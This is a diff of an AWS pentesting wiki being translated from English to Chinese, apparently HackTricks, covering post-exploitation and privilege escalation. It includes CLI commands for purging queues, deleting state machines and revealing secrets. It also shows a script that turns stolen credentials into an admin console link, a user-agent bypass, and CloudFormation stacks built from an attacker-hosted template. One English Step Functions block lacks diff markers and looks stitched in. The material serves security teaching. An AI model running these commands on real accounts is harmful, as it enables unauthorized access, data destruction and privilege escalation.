+**潜在影响**:未经授权访问主题、消息暴露或未经授权用户或服务对主题的操控,干扰依赖于该主题的应用程序的正常功能。 ### `sns:TagResource` , `sns:UntagResource` -An attacker could add, modify, or remove tags from SNS resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. - +攻击者可以添加、修改或删除SNS资源的标签,干扰您组织基于标签的成本分配、资源跟踪和访问控制策略。 ```bash aws sns tag-resource --resource-arn --tags Key=,Value= aws sns untag-resource --resource-arn --tag-keys ``` - -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. +**潜在影响**:成本分配、资源跟踪和基于标签的访问控制策略的中断。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md index 872693e89..f0ff235b8 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md @@ -1,10 +1,10 @@ -# AWS - SQS Post Exploitation +# AWS - SQS 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## SQS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-sqs-and-sns-enum.md @@ -12,80 +12,62 @@ For more information check: ### `sqs:SendMessage` , `sqs:SendMessageBatch` -An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources. - +攻击者可以向 SQS 队列发送恶意或不需要的消息,可能导致数据损坏、触发意外操作或耗尽资源。 ```bash aws sqs send-message --queue-url --message-body aws sqs send-message-batch --queue-url --entries ``` - -**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion. +**潜在影响**:漏洞利用,数据损坏,意外操作或资源耗尽。 ### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility` -An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages. - +攻击者可以接收、删除或修改SQS队列中消息的可见性,从而导致消息丢失、数据损坏或依赖这些消息的应用程序服务中断。 ```bash aws sqs receive-message --queue-url aws sqs delete-message --queue-url --receipt-handle aws sqs change-message-visibility --queue-url --receipt-handle --visibility-timeout ``` - -**Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages. +**潜在影响**:窃取敏感信息、消息丢失、数据损坏,以及依赖受影响消息的应用程序服务中断。 ### `sqs:DeleteQueue` -An attacker could delete an entire SQS queue, causing message loss and impacting applications relying on the queue. - +攻击者可以删除整个 SQS 队列,导致消息丢失并影响依赖该队列的应用程序。 ```arduino Copy codeaws sqs delete-queue --queue-url ``` - -**Potential Impact**: Message loss and service disruption for applications using the deleted queue. +**潜在影响**:使用已删除队列的应用程序可能会出现消息丢失和服务中断。 ### `sqs:PurgeQueue` -An attacker could purge all messages from an SQS queue, leading to message loss and potential disruption of applications relying on those messages. - +攻击者可以清除 SQS 队列中的所有消息,从而导致消息丢失和依赖这些消息的应用程序可能出现中断。 ```arduino Copy codeaws sqs purge-queue --queue-url ``` - -**Potential Impact**: Message loss and service disruption for applications relying on the purged messages. +**潜在影响**:依赖于被清除消息的应用程序可能会出现消息丢失和服务中断。 ### `sqs:SetQueueAttributes` -An attacker could modify the attributes of an SQS queue, potentially affecting its performance, security, or availability. 
- +攻击者可以修改SQS队列的属性,可能会影响其性能、安全性或可用性。 ```arduino aws sqs set-queue-attributes --queue-url --attributes ``` - -**Potential Impact**: Misconfigurations leading to degraded performance, security issues, or reduced availability. +**潜在影响**:错误配置导致性能下降、安全问题或可用性降低。 ### `sqs:TagQueue` , `sqs:UntagQueue` -An attacker could add, modify, or remove tags from SQS resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. - +攻击者可以添加、修改或删除SQS资源的标签,从而干扰您组织基于标签的成本分配、资源跟踪和访问控制策略。 ```bash aws sqs tag-queue --queue-url --tags Key=,Value= aws sqs untag-queue --queue-url --tag-keys ``` - -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. +**潜在影响**:成本分配、资源跟踪和基于标签的访问控制策略的中断。 ### `sqs:RemovePermission` -An attacker could revoke permissions for legitimate users or services by removing policies associated with the SQS queue. This could lead to disruptions in the normal functioning of applications that rely on the queue. - +攻击者可以通过删除与 SQS 队列相关的策略来撤销合法用户或服务的权限。这可能导致依赖该队列的应用程序正常运行的中断。 ```arduino arduinoCopy codeaws sqs remove-permission --queue-url --label ``` - -**Potential Impact**: Disruption of normal functioning for applications relying on the queue due to unauthorized removal of permissions. +**潜在影响**:由于未经授权的权限移除,依赖于队列的应用程序的正常功能受到干扰。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md index 0d636f261..bbf4c932a 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md @@ -1,10 +1,10 @@ -# AWS - SSO & identitystore Post Exploitation +# AWS - SSO & identitystore 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## SSO & identitystore -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-iam-enum.md @@ -12,8 +12,7 @@ For more information check: ### `sso:DeletePermissionSet` | `sso:PutPermissionsBoundaryToPermissionSet` | `sso:DeleteAccountAssignment` -These permissions can be used to disrupt permissions: - +这些权限可用于干扰权限: ```bash aws sso-admin delete-permission-set --instance-arn --permission-set-arn @@ -21,9 +20,4 @@ aws sso-admin put-permissions-boundary-to-permission-set --instance-arn --target-id --target-type --permission-set-arn --principal-type --principal-id ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md index 6a0cd5ba9..1725cdbd1 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md @@ -1,10 +1,10 @@ -# AWS - Step Functions Post Exploitation +# AWS - Step Functions 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## Step Functions -For more information about this AWS service, check: +有关此 AWS 服务的更多信息,请查看: {{#ref}} ../aws-services/aws-stepfunctions-enum.md @@ -12,20 +12,19 @@ For more information about this AWS service, check: ### `states:RevealSecrets` -This permission allows to **reveal secret 
data inside an execution**. For it, it's needed to set Inspection level to TRACE and the revealSecrets parameter to true. +此权限允许**在执行中揭示秘密数据**。为此,需要将检查级别设置为 TRACE,并将 revealSecrets 参数设置为 true。
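A minimal sketch of abusing this via the `TestState` API (the state definition, role ARN and parameter name below are placeholders, and the flags assume the `aws stepfunctions test-state` CLI):

```bash
# Test a single Task state that reads an SSM SecureString parameter,
# asking Step Functions to include normally-redacted values in the trace.
# Definition, role ARN and parameter name are hypothetical placeholders.
aws stepfunctions test-state \
  --definition '{"Type":"Task","Resource":"arn:aws:states:::aws-sdk:ssm:getParameter","Parameters":{"Name":"my-secret-param","WithDecryption":true},"End":true}' \
  --role-arn arn:aws:iam::123456789012:role/StepFunctionsTestRole \
  --input '{}' \
  --inspection-level TRACE \
  --reveal-secrets
```

If the call is allowed, the TRACE inspection data returned should contain the raw request/response of the state, including values that would otherwise be masked as secrets.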
### `states:DeleteStateMachine`, `states:DeleteStateMachineVersion`, `states:DeleteStateMachineAlias` -An attacker with these permissions would be able to permanently delete state machines, their versions, and aliases. This can disrupt critical workflows, result in data loss, and require significant time to recover and restore the affected state machines. In addition, it would allow an attacker to cover the tracks used, disrupt forensic investigations, and potentially cripple operations by removing essential automation processes and state configurations. +拥有这些权限的攻击者将能够永久删除状态机、其版本和别名。这可能会中断关键工作流程,导致数据丢失,并需要大量时间来恢复和恢复受影响的状态机。此外,这将允许攻击者掩盖所用的痕迹,干扰取证调查,并可能通过删除重要的自动化流程和状态配置来削弱操作。 > [!NOTE] > -> - Deleting a state machine you also delete all its associated versions and aliases. -> - Deleting a state machine alias you do not delete the state machine versions referecing this alias. -> - It is not possible to delete a state machine version currently referenced by one o more aliases. - +> - 删除状态机时,您还会删除其所有关联的版本和别名。 +> - 删除状态机别名时,您不会删除引用此别名的状态机版本。 +> - 当前引用一个或多个别名的状态机版本无法删除。 ```bash # Delete state machine aws stepfunctions delete-state-machine --state-machine-arn @@ -34,45 +33,34 @@ aws stepfunctions delete-state-machine-version --state-machine-version-arn ``` - -- **Potential Impact**: Disruption of critical workflows, data loss, and operational downtime. +- **潜在影响**: 关键工作流程中断、数据丢失和操作停机。 ### `states:UpdateMapRun` -An attacker with this permission would be able to manipulate the Map Run failure configuration and parallel setting, being able to increase or decrease the maximum number of child workflow executions allowed, affecting directly and performance of the service. In addition, an attacker could tamper with the tolerated failure percentage and count, being able to decrease this value to 0 so every time an item fails, the whole map run would fail, affecting directly to the state machine execution and potentially disrupting critical workflows. - +拥有此权限的攻击者将能够操纵 Map Run 失败配置和并行设置,能够增加或减少允许的最大子工作流执行数量,直接影响服务的性能。此外,攻击者还可以篡改容忍的失败百分比和计数,能够将此值减少到 0,这样每当一个项目失败时,整个 map run 将失败,直接影响状态机执行,并可能中断关键工作流程。 ```bash aws stepfunctions update-map-run --map-run-arn [--max-concurrency ] [--tolerated-failure-percentage ] [--tolerated-failure-count ] ``` - -- **Potential Impact**: Performance degradation, and disruption of critical workflows. +- **潜在影响**:性能下降,以及关键工作流程的中断。 ### `states:StopExecution` -An attacker with this permission could be able to stop the execution of any state machine, disrupting ongoing workflows and processes. This could lead to incomplete transactions, halted business operations, and potential data corruption. +拥有此权限的攻击者可能能够停止任何状态机的执行,从而中断正在进行的工作流程和过程。这可能导致交易不完整、业务操作中断以及潜在的数据损坏。 > [!WARNING] -> This action is not supported by **express state machines**. - +> 此操作不支持 **express state machines**。 ```bash aws stepfunctions stop-execution --execution-arn [--error ] [--cause ] ``` - -- **Potential Impact**: Disruption of ongoing workflows, operational downtime, and potential data corruption. +- **潜在影响**: 中断正在进行的工作流程、操作停机和潜在的数据损坏。 ### `states:TagResource`, `states:UntagResource` -An attacker could add, modify, or remove tags from Step Functions resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. 
- +攻击者可以添加、修改或删除 Step Functions 资源的标签,从而干扰您组织基于标签的成本分配、资源跟踪和访问控制策略。 ```bash aws stepfunctions tag-resource --resource-arn --tags Key=,Value= aws stepfunctions untag-resource --resource-arn --tag-keys ``` - -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. +**潜在影响**:成本分配、资源跟踪和基于标签的访问控制策略的中断。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md index 3cabd1b71..088234be1 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md @@ -1,24 +1,23 @@ -# AWS - STS Post Exploitation +# AWS - STS 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## STS -For more information: +更多信息: {{#ref}} ../aws-services/aws-iam-enum.md {{#endref}} -### From IAM Creds to Console +### 从 IAM 凭证到控制台 -If you have managed to obtain some IAM credentials you might be interested on **accessing the web console** using the following tools.\ -Note that the the user/role must have the permission **`sts:GetFederationToken`**. +如果您成功获取了一些 IAM 凭证,您可能会对使用以下工具**访问网络控制台**感兴趣。\ +请注意,用户/角色必须具有权限 **`sts:GetFederationToken`**。 -#### Custom script - -The following script will use the default profile and a default AWS location (not gov and not cn) to give you a signed URL you can use to login inside the web console: +#### 自定义脚本 +以下脚本将使用默认配置文件和默认 AWS 位置(非政府和非中国)为您提供一个签名 URL,您可以用它登录网络控制台: ```bash # Get federated creds (you must indicate a policy or they won't have any perms) ## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges @@ -26,8 +25,8 @@ The following script will use the default profile and a default AWS location (no output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess) if [ $? -ne 0 ]; then - echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status" - exit $status +echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status" +exit $status fi # Parse the output @@ -43,10 +42,10 @@ federation_endpoint="https://signin.aws.amazon.com/federation" # Make the HTTP request to get the sign-in token resp=$(curl -s "$federation_endpoint" \ - --get \ - --data-urlencode "Action=getSigninToken" \ - --data-urlencode "SessionDuration=43200" \ - --data-urlencode "Session=$json_creds" +--get \ +--data-urlencode "Action=getSigninToken" \ +--data-urlencode "SessionDuration=43200" \ +--data-urlencode "Session=$json_creds" ) signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri) @@ -55,11 +54,9 @@ signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri) # Give the URL to login echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token" ``` - #### aws_consoler -You can **generate a web console link** with [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler). - +您可以使用 [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler) **生成一个网络控制台链接**。 ```bash cd /tmp python3 -m venv env @@ -67,27 +64,23 @@ source ./env/bin/activate pip install aws-consoler aws_consoler [params...] 
#This will generate a link to login into the console ``` - > [!WARNING] -> Ensure the IAM user has `sts:GetFederationToken` permission, or provide a role to assume. +> 确保 IAM 用户具有 `sts:GetFederationToken` 权限,或提供一个角色以进行假设。 #### aws-vault -[**aws-vault**](https://github.com/99designs/aws-vault) is a tool to securely store and access AWS credentials in a development environment. - +[**aws-vault**](https://github.com/99designs/aws-vault) 是一个在开发环境中安全存储和访问 AWS 凭证的工具。 ```bash aws-vault list aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds aws-vault login jonsmith # Open a browser logged as jonsmith ``` - > [!NOTE] -> You can also use **aws-vault** to obtain an **browser console session** +> 您还可以使用 **aws-vault** 来获取 **浏览器控制台会话** -### **Bypass User-Agent restrictions from Python** - -If there is a **restriction to perform certain actions based on the user agent** used (like restricting the use of python boto3 library based on the user agent) it's possible to use the previous technique to **connect to the web console via a browser**, or you could directly **modify the boto3 user-agent** by doing: +### **通过 Python 绕过 User-Agent 限制** +如果存在 **基于用户代理执行某些操作的限制**(例如,基于用户代理限制使用 python boto3 库),可以使用前面的技术 **通过浏览器连接到 web 控制台**,或者您可以直接 **通过以下方式修改 boto3 用户代理**: ```bash # Shared by ex16x41 # Create a client @@ -100,9 +93,4 @@ client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda # Perform the action response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString']) ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md index fe4f69e25..1c0fc6310 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md @@ -1,17 +1,13 @@ -# AWS - VPN Post Exploitation +# AWS - VPN 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## VPN -For more information: +更多信息: {{#ref}} ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md index ba8374b41..d1ea4db27 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md @@ -1,27 +1,23 @@ -# AWS - Privilege Escalation +# AWS - 权限提升 {{#include ../../../banners/hacktricks-training.md}} -## AWS Privilege Escalation +## AWS 权限提升 -The way to escalate your privileges in AWS is to have enough permissions to be able to, somehow, access other roles/users/groups privileges. Chaining escalations until you have admin access over the organization. +在 AWS 中提升权限的方法是拥有足够的权限,以便能够以某种方式访问其他角色/用户/组的权限。通过链式提升,直到您获得组织的管理员访问权限。 > [!WARNING] -> AWS has **hundreds** (if not thousands) of **permissions** that an entity can be granted. In this book you can find **all the permissions that I know** that you can abuse to **escalate privileges**, but if you **know some path** not mentioned here, **please share it**. 
+> AWS 有 **数百**(如果不是数千)个 **权限** 可以授予实体。在本书中,您可以找到 **我知道的所有权限**,您可以利用这些权限来 **提升权限**,但如果您 **知道一些未提及的路径**,**请分享**。 > [!CAUTION] -> If an IAM policy has `"Effect": "Allow"` and `"NotAction": "Someaction"` indicating a **resource**... that means that the **allowed principal** has **permission to do ANYTHING but that specified action**.\ -> So remember that this is another way to **grant privileged permissions** to a principal. +> 如果 IAM 策略具有 `"Effect": "Allow"` 和 `"NotAction": "Someaction"` 指示一个 **资源**... 这意味着 **被允许的主体** 有 **权限执行除指定操作以外的任何操作**。\ +> 所以请记住,这是一种 **授予主体特权权限** 的另一种方式。 -**The pages of this section are ordered by AWS service. In there you will be able to find permissions that will allow you to escalate privileges.** +**本节的页面按 AWS 服务排序。在这里,您将能够找到允许您提升权限的权限。** -## Tools +## 工具 - [https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py](https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py) - [Pacu](https://github.com/RhinoSecurityLabs/pacu) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md index 7f7edbc6e..99be2c6ac 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md @@ -4,7 +4,7 @@ ## Apigateway -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-api-gateway-enum.md @@ -12,44 +12,37 @@ For more information check: ### `apigateway:POST` -With this permission you can generate API keys of the APIs configured (per region). - +拥有此权限,您可以生成已配置的 API 的 API 密钥(按区域)。 ```bash aws --region apigateway create-api-key ``` - -**Potential Impact:** You cannot privesc with this technique but you might get access to sensitive info. +**潜在影响:** 你无法通过此技术进行权限提升,但你可能会获得敏感信息的访问权限。 ### `apigateway:GET` -With this permission you can get generated API keys of the APIs configured (per region). - +通过此权限,你可以获取配置的 API 的生成 API 密钥(按区域)。 ```bash aws --region apigateway get-api-keys aws --region apigateway get-api-key --api-key --include-value ``` - -**Potential Impact:** You cannot privesc with this technique but you might get access to sensitive info. +**潜在影响:** 你无法通过这种技术进行权限提升,但你可能会获得敏感信息的访问权限。 ### `apigateway:UpdateRestApiPolicy`, `apigateway:PATCH` -With these permissions it's possible to modify the resource policy of an API to give yourself access to call it and abuse potential access the API gateway might have (like invoking a vulnerable lambda). - +拥有这些权限后,可以修改API的资源策略,以便为自己提供调用它的权限,并滥用API网关可能具有的潜在访问权限(例如调用一个脆弱的lambda)。 ```bash aws apigateway update-rest-api \ - --rest-api-id api-id \ - --patch-operations op=replace,path=/policy,value='"{\"jsonEscapedPolicyDocument\"}"' +--rest-api-id api-id \ +--patch-operations op=replace,path=/policy,value='"{\"jsonEscapedPolicyDocument\"}"' ``` - -**Potential Impact:** You, usually, won't be able to privesc directly with this technique but you might get access to sensitive info. 
+**潜在影响:** 通常情况下,您无法直接通过此技术进行权限提升,但您可能会获得敏感信息的访问权限。 ### `apigateway:PutIntegration`, `apigateway:CreateDeployment`, `iam:PassRole` > [!NOTE] -> Need testing - -An attacker with the permissions `apigateway:PutIntegration`, `apigateway:CreateDeployment`, and `iam:PassRole` can **add a new integration to an existing API Gateway REST API with a Lambda function that has an IAM role attached**. The attacker can then **trigger the Lambda function to execute arbitrary code and potentially gain access to the resources associated with the IAM role**. +> 需要测试 +具有权限 `apigateway:PutIntegration`、`apigateway:CreateDeployment` 和 `iam:PassRole` 的攻击者可以 **向现有的 API Gateway REST API 添加一个带有附加 IAM 角色的 Lambda 函数的新集成**。攻击者可以然后 **触发 Lambda 函数以执行任意代码,并可能获得与 IAM 角色相关联的资源的访问权限**。 ```bash API_ID="your-api-id" RESOURCE_ID="your-resource-id" @@ -63,16 +56,14 @@ aws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` - -**Potential Impact**: Access to resources associated with the Lambda function's IAM role. +**潜在影响**:访问与Lambda函数的IAM角色相关的资源。 ### `apigateway:UpdateAuthorizer`, `apigateway:CreateDeployment` > [!NOTE] -> Need testing - -An attacker with the permissions `apigateway:UpdateAuthorizer` and `apigateway:CreateDeployment` can **modify an existing API Gateway authorizer** to bypass security checks or to execute arbitrary code when API requests are made. +> 需要测试 +拥有权限`apigateway:UpdateAuthorizer`和`apigateway:CreateDeployment`的攻击者可以**修改现有的API Gateway授权者**以绕过安全检查或在API请求时执行任意代码。 ```bash API_ID="your-api-id" AUTHORIZER_ID="your-authorizer-id" @@ -84,16 +75,14 @@ aws apigateway update-authorizer --rest-api-id $API_ID --authorizer-id $AUTHORIZ # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` - -**Potential Impact**: Bypassing security checks, unauthorized access to API resources. +**潜在影响**:绕过安全检查,未经授权访问API资源。 ### `apigateway:UpdateVpcLink` > [!NOTE] -> Need testing - -An attacker with the permission `apigateway:UpdateVpcLink` can **modify an existing VPC Link to point to a different Network Load Balancer, potentially redirecting private API traffic to unauthorized or malicious resources**. +> 需要测试 +拥有权限`apigateway:UpdateVpcLink`的攻击者可以**修改现有的VPC链接,使其指向不同的网络负载均衡器,可能会将私有API流量重定向到未经授权或恶意的资源**。 ```bash bashCopy codeVPC_LINK_ID="your-vpc-link-id" NEW_NLB_ARN="arn:aws:elasticloadbalancing:region:account-id:loadbalancer/net/new-load-balancer-name/50dc6c495c0c9188" @@ -101,11 +90,6 @@ NEW_NLB_ARN="arn:aws:elasticloadbalancing:region:account-id:loadbalancer/net/new # Update the VPC Link aws apigateway update-vpc-link --vpc-link-id $VPC_LINK_ID --patch-operations op=replace,path=/targetArns,value="[$NEW_NLB_ARN]" ``` - -**Potential Impact**: Unauthorized access to private API resources, interception or disruption of API traffic. 
+**潜在影响**:未经授权访问私有API资源,拦截或干扰API流量。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md index b477dc31f..b83d1489e 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md @@ -4,10 +4,6 @@ ### chime:CreateApiKey -TODO +待办事项 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md index 39cba539e..e11e41cea 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md @@ -4,7 +4,7 @@ ## cloudformation -For more information about cloudformation check: +有关 cloudformation 的更多信息,请查看: {{#ref}} ../../aws-services/aws-cloudformation-and-codestar-enum.md @@ -12,111 +12,99 @@ For more information about cloudformation check: ### `iam:PassRole`, `cloudformation:CreateStack` -An attacker with these permissions **can escalate privileges** by crafting a **CloudFormation stack** with a custom template, hosted on their server, to **execute actions under the permissions of a specified role:** - +具有这些权限的攻击者 **可以提升权限**,通过制作一个 **CloudFormation 堆栈**,使用托管在其服务器上的自定义模板,**在指定角色的权限下执行操作:** ```bash aws cloudformation create-stack --stack-name \ - --template-url http://attacker.com/attackers.template \ - --role-arn +--template-url http://attacker.com/attackers.template \ +--role-arn ``` - -In the following page you have an **exploitation example** with the additional permission **`cloudformation:DescribeStacks`**: +在以下页面中,您有一个 **利用示例**,附加权限为 **`cloudformation:DescribeStacks`**: {{#ref}} iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md {{#endref}} -**Potential Impact:** Privesc to the cloudformation service role specified. +**潜在影响:** 提升到指定的 cloudformation 服务角色。 -### `iam:PassRole`, (`cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`) - -In this case you can a**buse an existing cloudformation stack** to update it and escalate privileges as in the previous scenario: +### `iam:PassRole`,(`cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`) +在这种情况下,您可以 **滥用现有的 cloudformation 堆栈** 来更新它并提升权限,如前面的场景所示: ```bash aws cloudformation update-stack \ - --stack-name privesc \ - --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ - --role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \ - --capabilities CAPABILITY_IAM \ - --region eu-west-1 +--stack-name privesc \ +--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ +--role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \ +--capabilities CAPABILITY_IAM \ +--region eu-west-1 ``` +`cloudformation:SetStackPolicy` 权限可以用来 **给自己 `UpdateStack` 权限** 以便对一个堆栈进行攻击。 -The `cloudformation:SetStackPolicy` permission can be used to **give yourself `UpdateStack` permission** over a stack and perform the attack. - -**Potential Impact:** Privesc to the cloudformation service role specified. 
+**潜在影响:** 提升到指定的 cloudformation 服务角色。 ### `cloudformation:UpdateStack` | `cloudformation:SetStackPolicy` -If you have this permission but **no `iam:PassRole`** you can still **update the stacks** used and abuse the **IAM Roles they have already attached**. Check the previous section for exploit example (just don't indicate any role in the update). +如果你拥有这个权限但 **没有 `iam:PassRole`**,你仍然可以 **更新已使用的堆栈** 并滥用 **它们已经附加的 IAM 角色**。请查看前面的部分以获取利用示例(只需在更新中不指明任何角色)。 -The `cloudformation:SetStackPolicy` permission can be used to **give yourself `UpdateStack` permission** over a stack and perform the attack. +`cloudformation:SetStackPolicy` 权限可以用来 **给自己 `UpdateStack` 权限** 以便对一个堆栈进行攻击。 -**Potential Impact:** Privesc to the cloudformation service role already attached. +**潜在影响:** 提升到已经附加的 cloudformation 服务角色。 ### `iam:PassRole`,((`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`) -An attacker with permissions to **pass a role and create & execute a ChangeSet** can **create/update a new cloudformation stack abuse the cloudformation service roles** just like with the CreateStack or UpdateStack. - -The following exploit is a **variation of the**[ **CreateStack one**](./#iam-passrole-cloudformation-createstack) using the **ChangeSet permissions** to create a stack. +拥有 **传递角色和创建 & 执行 ChangeSet** 权限的攻击者可以 **创建/更新一个新的 cloudformation 堆栈,滥用 cloudformation 服务角色**,就像使用 CreateStack 或 UpdateStack 一样。 +以下利用是 **变体**[ **CreateStack 的**](./#iam-passrole-cloudformation-createstack),使用 **ChangeSet 权限** 来创建一个堆栈。 ```bash aws cloudformation create-change-set \ - --stack-name privesc \ - --change-set-name privesc \ - --change-set-type CREATE \ - --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ - --role arn:aws:iam::947247140022:role/CloudFormationAdmin \ - --capabilities CAPABILITY_IAM \ - --region eu-west-1 +--stack-name privesc \ +--change-set-name privesc \ +--change-set-type CREATE \ +--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ +--role arn:aws:iam::947247140022:role/CloudFormationAdmin \ +--capabilities CAPABILITY_IAM \ +--region eu-west-1 echo "Waiting 2 mins to change the stack" sleep 120 aws cloudformation execute-change-set \ - --change-set-name privesc \ - --stack-name privesc \ - --region eu-west-1 +--change-set-name privesc \ +--stack-name privesc \ +--region eu-west-1 echo "Waiting 2 mins to execute the stack" sleep 120 aws cloudformation describe-stacks \ - --stack-name privesc \ - --region eu-west-1 +--stack-name privesc \ +--region eu-west-1 ``` +`cloudformation:SetStackPolicy` 权限可以用来 **给自己 `ChangeSet` 权限** 以便对一个堆栈执行攻击。 -The `cloudformation:SetStackPolicy` permission can be used to **give yourself `ChangeSet` permissions** over a stack and perform the attack. - -**Potential Impact:** Privesc to cloudformation service roles. +**潜在影响:** 提升到 cloudformation 服务角色的权限。 ### (`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`) -This is like the previous method without passing **IAM roles**, so you can just **abuse already attached ones**, just modify the parameter: - +这与之前的方法类似,不需要传递 **IAM 角色**,所以你可以 **滥用已经附加的角色**,只需修改参数: ``` --change-set-type UPDATE ``` - -**Potential Impact:** Privesc to the cloudformation service role already attached. 
